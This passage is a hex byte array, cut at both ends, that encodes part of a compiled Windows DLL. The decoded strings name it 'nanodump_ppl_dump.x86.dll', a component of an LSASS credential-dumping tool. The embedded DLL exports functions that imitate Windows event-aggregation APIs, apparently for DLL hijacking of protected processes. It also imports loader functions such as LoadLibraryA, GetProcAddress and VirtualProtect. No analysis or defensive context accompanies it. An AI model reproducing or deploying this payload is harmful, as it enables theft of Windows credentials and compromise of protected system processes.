,0x0C,0x04,0x04,0x88,0x01,0x00,0x00,0x10,0x00,0x00,0x00,0x1C,0x00,0x00,0x00,0x4C,0xAC,0xFF,0xFF,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x9C,0x79,0x7A,0x68,0x00,0x00,0x00,0x00,0x96,0x50,0x01,0x00,0x01,0x00,0x00,0x00,0x0B,0x00,0x00,0x00,0x0B,0x00,0x00,0x00,0x28,0x50,0x01,0x00,0x54,0x50,0x01,0x00,0x80,0x50,0x01,0x00,0xD6,0xB9,0x00,0x00,0xDC,0xB9,0x00,0x00,0x8F,0xB9,0x00,0x00,0xE8,0xB9,0x00,0x00,0x06,0xBA,0x00,0x00,0xF4,0xB9,0x00,0x00,0xE2,0xB9,0x00,0x00,0x00,0xBA,0x00,0x00,0xFA,0xB9,0x00,0x00,0xEE,0xB9,0x00,0x00,0xD0,0xB9,0x00,0x00,0xB0,0x50,0x01,0x00,0xC9,0x50,0x01,0x00,0xE2,0x50,0x01,0x00,0xED,0x50,0x01,0x00,0x06,0x51,0x01,0x00,0x1F,0x51,0x01,0x00,0x3B,0x51,0x01,0x00,0x55,0x51,0x01,0x00,0x6F,0x51,0x01,0x00,0x91,0x51,0x01,0x00,0xB4,0x51,0x01,0x00,0x00,0x00,0x01,0x00,0x02,0x00,0x03,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x07,0x00,0x08,0x00,0x09,0x00,0x0A,0x00,0x6E,0x61,0x6E,0x6F,0x64,0x75,0x6D,0x70,0x5F,0x70,0x70,0x6C,0x5F,0x64,0x75,0x6D,0x70,0x2E,0x78,0x38,0x36,0x2E,0x64,0x6C,0x6C,0x00,0x42,0x72,0x69,0x43,0x72,0x65,0x61,0x74,0x65,0x42,0x72,0x6F,0x6B,0x65,0x72,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x40,0x30,0x00,0x42,0x72,0x69,0x44,0x65,0x6C,0x65,0x74,0x65,0x42,0x72,0x6F,0x6B,0x65,0x72,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x40,0x30,0x00,0x44,0x6C,0x6C,0x4D,0x61,0x69,0x6E,0x40,0x31,0x32,0x00,0x45,0x41,0x43,0x72,0x65,0x61,0x74,0x65,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x45,0x76,0x65,0x6E,0x74,0x40,0x30,0x00,0x45,0x41,0x44,0x65,0x6C,0x65,0x74,0x65,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x45,0x76,0x65,0x6E,0x74,0x40,0x30,0x00,0x45,0x41,0x51,0x75,0x65,0x72,0x79,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x45,0x76,0x65,0x6E,0x74,0x44,0x61,0x74,0x61,0x40,0x30,0x00,0x45,0x61,0x43,0x72,0x65,0x61,0x74,0x65,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x40,0x30,0x00,0x45,0x61,0x44,0x65,0x6C,0x65,0x74,0x65,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x40,0x30,0x00,0x45,0x61,0x46,0x72,0x65,0x65,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x50,0x61,0x72,0x61,0x6D,0x65,0x74,0x65,0x72,0x73,0x40,0x30,0x00,0x45,0x61,0x51,0x75,0x65,0x72,0x79,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x50,0x61,0x72,0x61,0x6D,0x65,0x74,0x65,0x72,0x73,0x40,0x30,0x00,0x4C,0x6F,0x67,0x6F,0x6E,0x55,0x73,0x65,0x72,0x45,0x78,0x45,0x78,0x57,0x40,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x3C,0x60,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x34,0x65,0x01,0x00,0x24,0x61,0x01,0x00,0x98,0x60,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xCC,0x65,0x01,0x00,0x80,0x61,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0C,0x62,0x01,0x00,0x1C,0x62,0x01,0x00,0x34,0x62,0x01,0x00,0x4C,0x62,0x01,0x00,0x5A,0x62,0x01,0x00,0x6A,0x62,0x01,0x00,0x7E,0x62,0x01,0x00,0x92,0x62,0x01,0x00,0xA4,0x62,0x01,0x00,0xB6,0x62,0x01,0x00,0xC6,0x62,0x01,0x00,0xD2,0x62,0x01,0x00,0xDE,0x62,0x01,0x00,0xFA,0x62,0x01,0x00,0x12,0x63,0x01,0x00,0x22,0x63,0x01,0x00,0x30,0x63,0x01,0x00,0x3C,0x63,0x01,0x00,0x44,0x63,0x01,0x00,0x52,0x63,0x01,0x00,0x64,0x63,0x01,0x00,0x74,0x63,0x01,0x00,0x00,0x00,0x00,0x00,0x84,0x63,0x01,0x00,0x92,0x63,0x01,0x00,0x9C,0x63,0x01,0x00,0xA8,0x63,0x01,0x00,0xB0,0x63,0x01,0x00,0xB8,0x63,0x01,0x00,0xC2,0x63,0x01,0x00,0xD0,0x63,0x01,0x00,0xDC,0x63,0x01,0x00,0xE4,0x63,0x01,0x00,0xEE,0x63,0x01,0x00,0xF6,0x63,0x01,0x00,0x00,0x64,0x01,0x00,0x0A,0x64,0x01,0x00,0x16,0x64,0x01,0x00,0x20,0x64,0x01,0x00,0x2A,0x64,0x01,0x00,0x34,0x64,0x01,0x00,0x3C,0x64,0x01,0x00,0x46,0x64,0x01,0x00,0x4E,0x64,0x01,0x00,0x58,0x64,0x01,0x00,0x62,0x64,0x01,0x00,0x6C,0x64,0x01,0x00,0x76,0x64,0x01,0x00,0x80,0x64,0x01,0x00,0x8C,0x64,0x01,0x00,0x94,0x64,0x01,0x00,0x9E,0x64,0x01,0x00,0xA8,0x64,0x01,0x00,0xB2,0x64,0x01,0x00,0xBC,0x64,0x01,0x00,0xC6,0x64,0x01,0x00,0xD2,0x64,0x01,0x00,0x00,0x00,0x00,0x00,0x0C,0x62,0x01,0x00,0x1C,0x62,0x01,0x00,0x34,0x62,0x01,0x00,0x4C,0x62,0x01,0x00,0x5A,0x62,0x01,0x00,0x6A,0x62,0x01,0x00,0x7E,0x62,0x01,0x00,0x92,0x62,0x01,0x00,0xA4,0x62,0x01,0x00,0xB6,0x62,0x01,0x00,0xC6,0x62,0x01,0x00,0xD2,0x62,0x01,0x00,0xDE,0x62,0x01,0x00,0xFA,0x62,0x01,0x00,0x12,0x63,0x01,0x00,0x22,0x63,0x01,0x00,0x30,0x63,0x01,0x00,0x3C,0x63,0x01,0x00,0x44,0x63,0x01,0x00,0x52,0x63,0x01,0x00,0x64,0x63,0x01,0x00,0x74,0x63,0x01,0x00,0x00,0x00,0x00,0x00,0x84,0x63,0x01,0x00,0x92,0x63,0x01,0x00,0x9C,0x63,0x01,0x00,0xA8,0x63,0x01,0x00,0xB0,0x63,0x01,0x00,0xB8,0x63,0x01,0x00,0xC2,0x63,0x01,0x00,0xD0,0x63,0x01,0x00,0xDC,0x63,0x01,0x00,0xE4,0x63,0x01,0x00,0xEE,0x63,0x01,0x00,0xF6,0x63,0x01,0x00,0x00,0x64,0x01,0x00,0x0A,0x64,0x01,0x00,0x16,0x64,0x01,0x00,0x20,0x64,0x01,0x00,0x2A,0x64,0x01,0x00,0x34,0x64,0x01,0x00,0x3C,0x64,0x01,0x00,0x46,0x64,0x01,0x00,0x4E,0x64,0x01,0x00,0x58,0x64,0x01,0x00,0x62,0x64,0x01,0x00,0x6C,0x64,0x01,0x00,0x76,0x64,0x01,0x00,0x80,0x64,0x01,0x00,0x8C,0x64,0x01,0x00,0x94,0x64,0x01,0x00,0x9E,0x64,0x01,0x00,0xA8,0x64,0x01,0x00,0xB2,0x64,0x01,0x00,0xBC,0x64,0x01,0x00,0xC6,0x64,0x01,0x00,0xD2,0x64,0x01,0x00,0x00,0x00,0x00,0x00,0x26,0x00,0x41,0x74,0x74,0x61,0x63,0x68,0x43,0x6F,0x6E,0x73,0x6F,0x6C,0x65,0x00,0x13,0x01,0x44,0x65,0x6C,0x65,0x74,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x34,0x01,0x45,0x6E,0x74,0x65,0x72,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x00,0xAF,0x01,0x46,0x72,0x65,0x65,0x4C,0x69,0x62,0x72,0x61,0x72,0x79,0x00,0x67,0x02,0x47,0x65,0x74,0x4C,0x61,0x73,0x74,0x45,0x72,0x72,0x6F,0x72,0x00,0x00,0x7B,0x02,0x47,0x65,0x74,0x4D,0x6F,0x64,0x75,0x6C,0x65,0x48,0x61,0x6E,0x64,0x6C,0x65,0x41,0x00,0x00,0x7E,0x02,0x47,0x65,0x74,0x4D,0x6F,0x64,0x75,0x6C,0x65,0x48,0x61,0x6E,0x64,0x6C,0x65,0x57,0x00,0x00,0xB4,0x02,0x47,0x65,0x74,0x50,0x72,0x6F,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73,0x00,0x00,0xBA,0x02,0x47,0x65,0x74,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x48,0x65,0x61,0x70,0x00,0x00,0xDA,0x02,0x47,0x65,0x74,0x53,0x74,0x64,0x48,0x61,0x6E,0x64,0x6C,0x65,0x00,0x00,0x4E,0x03,0x48,0x65,0x61,0x70,0x41,0x6C,0x6C,0x6F,0x63,0x00,0x54,0x03,0x48,0x65,0x61,0x70,0x46,0x72,0x65,0x65,0x00,0x00,0x6B,0x03,0x49,0x6E,0x69,0x74,0x69,0x61,0x6C,0x69,0x7A,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0xCB,0x03,0x4C,0x65,0x61,0x76,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x00,0xCF,0x03,0x4C,0x6F,0x61,0x64,0x4C,0x69,0x62,0x72,0x61,0x72,0x79,0x41,0x00,0x00,0xD8,0x03,0x4C,0x6F,0x63,0x61,0x6C,0x41,0x6C,0x6C,0x6F,0x63,0x00,0x00,0xDD,0x03,0x4C,0x6F,0x63,0x61,0x6C,0x46,0x72,0x65,0x65,0x00,0x66,0x05,0x53,0x6C,0x65,0x65,0x70,0x00,0x89,0x05,0x54,0x6C,0x73,0x47,0x65,0x74,0x56,0x61,0x6C,0x75,0x65,0x00,0xB9,0x05,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x50,0x72,0x6F,0x74,0x65,0x63,0x74,0x00,0x00,0xBC,0x05,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x51,0x75,0x65,0x72,0x79,0x00,0x00,0xF7,0x05,0x57,0x72,0x69,0x74,0x65,0x43,0x6F,0x6E,0x73,0x6F,0x6C,0x65,0x41,0x00,0x8E,0x00,0x5F,0x61,0x6D,0x73,0x67,0x5F,0x65,0x78,0x69,0x74,0x00,0x00,0xD1,0x00,0x5F,0x65,0x72,0x72,0x6E,0x6F,0x00,0x00,0x32,0x01,0x5F,0x69,0x6E,0x69,0x74,0x74,0x65,0x72,0x6D,0x00,0x36,0x01,0x5F,0x69,0x6F,0x62,0x00,0x00,0x99,0x01,0x5F,0x6C,0x6F,0x63,0x6B,0x00,0xE5,0x02,0x5F,0x75,0x6E,0x6C,0x6F,0x63,0x6B,0x00,0x00,0x03,0x5F,0x76,0x73,0x6E,0x70,0x72,0x69,0x6E,0x74,0x66,0x00,0x00,0x22,0x03,0x5F,0x77,0x63,0x73,0x69,0x63,0x6D,0x70,0x00,0x00,0x9D,0x03,0x61,0x62,0x6F,0x72,0x74,0x00,0xAA,0x03,0x63,0x61,0x6C,0x6C,0x6F,0x63,0x00,0x00,0xCC,0x03,0x66,0x72,0x65,0x65,0x00,0x00,0xD9,0x03,0x66,0x77,0x72,0x69,0x74,0x65,0x00,0x00,0x07,0x04,0x6D,0x61,0x6C,0x6C,0x6F,0x63,0x00,0x00,0x0A,0x04,0x6D,0x62,0x73,0x74,0x6F,0x77,0x63,0x73,0x00,0x00,0x0E,0x04,0x6D,0x65,0x6D,0x63,0x6D,0x70,0x00,0x00,0x0F,0x04,0x6D,0x65,0x6D,0x63,0x70,0x79,0x00,0x00,0x11,0x04,0x6D,0x65,0x6D,0x73,0x65,0x74,0x00,0x00,0x21,0x04,0x72,0x61,0x6E,0x64,0x00,0x00,0x22,0x04,0x72,0x65,0x61,0x6C,0x6C,0x6F,0x63,0x00,0x32,0x04,0x73,0x72,0x61,0x6E,0x64,0x00,0x39,0x04,0x73,0x74,0x72,0x63,0x6D,0x70,0x00,0x00,0x40,0x04,0x73,0x74,0x72,0x6C,0x65,0x6E,0x00,0x00,0x43,0x04,0x73,0x74,0x72,0x6E,0x63,0x6D,0x70,0x00,0x44,0x04,0x73,0x74,0x72,0x6E,0x63,0x70,0x79,0x00,0x47,0x04,0x73,0x74,0x72,0x72,0x63,0x68,0x72,0x00,0x65,0x04,0x76,0x66,0x70,0x72,0x69,0x6E,0x74,0x66,0x00,0x00,0xCD,0x02,0x74,0x69,0x6D,0x65,0x00,0x00,0x7F,0x04,0x77,0x63,0x73,0x6C,0x65,0x6E,0x00,0x00,0x80,0x04,0x77,0x63,0x73,0x6E,0x63,0x61,0x74,0x00,0x83,0x04,0x77,0x63,0x73,0x6E,0x63,0x70,0x79,0x00,0x87,0x04,0x77,0x63,0x73,0x72,0x63,0x68,0x72,0x00,0x8A,0x04,0x77,0x63,0x73,0x73,0x74,0x72,0x00,0x00,0x8F,0x04,0x77,0x63,0x73,0x74,0x6F,0x6D,0x62,0x73,0x00,0x00,0x91,0x04,0x77,0x63,0x73,0x74,0x6F,0x75,0x6C,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x00,0x60,0x01,0x00,0x4B,0x45,0x52,0x4E,0x45,0x4C,0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x14,0x60,0x01,0x00,0x6D,0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x48,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0xBB,0x48,0x65,0xD0,0xBA,0x48,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x94,0x00,0x00,0x00,0x09,0x30,0x31,0x30,0x40,0x30,0x47,0x30,0x67,0x30,0x72,0x30,0xAD,0x30,0xDA,0x30,0xE5,0x30,0xF3,0x30,0x00,0x31,0x12,0x31,0x36,0x31,0x4B,0x31,0x56,0x31,0x60,0x31,0x82,0x31,0x92,0x31,0x9E,0x31,0xA5,0x31,0xBC,0x31,0xC3,0x31,0xCE,0x31,0x11,0x32,0x1A,0x32,0x74,0x32,0xB8,0x33,0xEC,0x33,0x0C,0x34,0x12,0x34,0x22,0x34,0x28,0x34,0x2E,0x34,0x36,0x34,0x3E,0x34,0x50,0x34,0x5D,0x34,0x69,0x34,0x70,0x34,0x79,0x34,0xA7,0x34,0xB2,0x34,0xB9,0x34,0xC6,0x34,0x24,0x38,0x2C,0x38,0x34,0x38,0x44,0x38,0x70,0x38,0x78,0x38,0x80,0x38,0x90,0x38,0xBC,0x38,0xC4,0x38,0xCC,0x38,0xDC,0x38,0x20,0x39,0x28,0x39,0x30,0x39,0x40,0x39,0x6C,0x39,0x74,0x39,0x7C,0x39,0x8C,0x39,0x16,0x3A,0x57,0x3F,0x71,0x3F,0xC2,0x3F,0xCE,0x3F,0xF8,0x3F,0x00,0x20,0x00,0x00,0x5C,0x00,0x00,0x00,0x0E,0x30,0xE8,0x30,0xFE,0x30,0x18,0x31,0x2E,0x31,0x3C,0x33,0x55,0x33,0x6B,0x33,0x84,0x33,0x9A,0x33,0xB3,0x33,0xC3,0x33,0xDC,0x33,0x67,0x35,0x81,0x35,0x72,0x36,0x8B,0x36,0x9F,0x36,0xB5,0x36,0xC9,0x36,0xDF,0x36,0xF3,0x36,0x09,0x37,0x43,0x37,0x5D,0x37,0x6A,0x37,0x84,0x37,0x91,0x37,0xAB,0x37,0x92,0x38,0xAB,0x38,0xDD,0x38,0xF6,0x38,0x28,0x39,0x41,0x39,0xC7,0x3B,0xF9,0x3B,0xF9,0x3C,0x3C,0x3E,0xBB,0x3E,0x6E,0x3F,0x00,0x00,0x00,0x30,0x00,0x00,0x48,0x00,0x00,0x00,0x3F,0x30,0xCF,0x30,0x20,0x32,0x4D,0x33,0x59,0x33,0xF5,0x33,0x01,0x34,0x4F,0x38,0x69,0x38,0x20,0x3A,0x39,0x3A,0x63,0x3A,0x8E,0x3A,0x9B,0x3A,0xB4,0x3A,0xE6,0x3A,0x01,0x3B,0x29,0x3B,0x53,0x3B,0x6C,0x3B,0x9C,0x3C,0xD5,0x3C,0x0E,0x3D,0x55,0x3D,0x6F,0x3D,0x91,0x3D,0x78,0x3F,0x91,0x3F,0xB5